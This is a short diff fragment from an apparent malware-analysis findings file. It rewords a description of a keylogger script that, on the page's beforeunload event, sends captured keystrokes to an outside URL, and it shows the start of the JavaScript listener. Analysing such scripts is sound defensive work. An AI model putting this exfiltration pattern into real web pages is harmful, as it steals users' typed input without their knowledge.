dimeko/malsmug/findings.md

         }
     });
     ```
-- Initializes listener on event `beforeunload`: this enables the attacker to execute code just before the DOM is destroyed.
-On `beforeunload` the script sends the content of the `keys` variable to the url "https://something.refreshment.ltd/keys";
+- Initializes a listener on the `beforeunload` event: This enables the attacker to execute code just before the DOM is destroyed.
+On `beforeunload`, the script sends the content of the `keys` variable to the URL `"https://something.refreshment.ltd/keys"`;
     ```javascript
     window.addEventListener("beforeunload", function (e) {
         if (keys.length === 0) {